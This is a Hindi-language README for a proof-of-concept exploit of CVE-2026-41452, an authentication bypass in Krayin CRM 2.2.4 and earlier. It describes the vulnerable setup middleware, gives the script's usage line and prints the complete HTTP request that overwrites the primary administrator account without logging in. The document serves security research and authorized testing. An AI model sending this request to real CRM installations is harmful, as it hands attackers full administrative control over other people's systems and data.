
CVE-2026-41452 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, जो Krayin CRM <= 2.2.4 में एक गंभीर ऑथेंटिकेशन बायपास है, जो मिडलवेयर बायपास के माध्यम से अनऑथेंटिकेटेड एडमिन अकाउंट टेकओवर की अनुमति देता है।
एक Proof of Concept (PoC) जो Krayin CRM संस्करण 2.2.4 और उससे पहले के संस्करणों को प्रभावित करने वाली एक गंभीर अनुपस्थित प्रमाणीकरण (missing authentication) कमजोरी (CVE-2026-41452) को प्रदर्शित करता है।
यह दोष अनधिकृत रिमोट हमलावरों को विशिष्ट HTTP हेडर इंजेक्ट करके एप्लिकेशन के इंस्टॉलेशन मिडलवेयर लॉजिक (CanInstall) को बायपास करने की अनुमति देता है, जिससे प्राथमिक एडमिनिस्ट्रेटर अकाउंट कॉन्फ़िगरेशन पूरी तरह से ओवरराइट हो जाता है।
[!WARNING]
अस्वीकरण: यह रिपॉज़िटरी और इसमें निहित जानकारी पूर्णतः शैक्षिक उद्देश्यों, सुरक्षा अनुसंधान और अधिकृत रक्षात्मक ऑडिटिंग के लिए प्रदान की गई है। कंप्यूटर सिस्टम का अनधिकृत परीक्षण या शोषण पूर्णतः अवैध है। लेखक इस सामग्री के किसी भी दुरुपयोग के लिए कोई दायित्व स्वीकार नहीं करता।
CVE ID: CVE-2026-41452
कमजोरी का प्रकार: अनुपस्थित प्रमाणीकरण / मिडलवेयर बायपास
गंभीरता: गंभीर (CVSS 9.8)
प्रभावित सॉफ़्टवेयर: Krayin CRM <= 2.2.4
पैच किया गया संस्करण: Krayin CRM >= 2.2.5
यह कमजोरी एप्लिकेशन के सेटअप मिडलवेयर में निहित है। एक अनधिकृत हमलावर /install/api/admin-config-setup एंडपॉइंट को लक्षित करते हुए एक तैयार किए गए पेलोड में X-Requested-With: XMLHttpRequest हेडर जोड़ सकता है। यह CanInstall मिडलवेयर के भीतर अपेक्षित रीडायरेक्शन जाँच को दबा देता है, जिससे एक अनधिकृत updateOrInsert डेटाबेस ऑपरेशन उजागर हो जाता है जो प्राथमिक सिस्टम एडमिनिस्ट्रेटर की हार्डकोडेड ID (1) को लक्षित करता है।
स्क्रिप्ट को उस लक्ष्य इंस्टेंस के विरुद्ध चलाएँ जिसका परीक्षण करने के लिए आप अधिकृत हैं:
./poc.sh <TARGET-URL> <USERNAME> <EMAIL> <PASSWORD>
आंतरिक रूप से, बायपास निम्नलिखित HTTP ट्रांज़ैक्शन संरचना के माध्यम से ट्रिगर होता है:
POST /install/api/admin-config-setup HTTP/1.1
Host: target-crm.local
X-Requested-With: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded
name=test1&[email protected]&password=Password123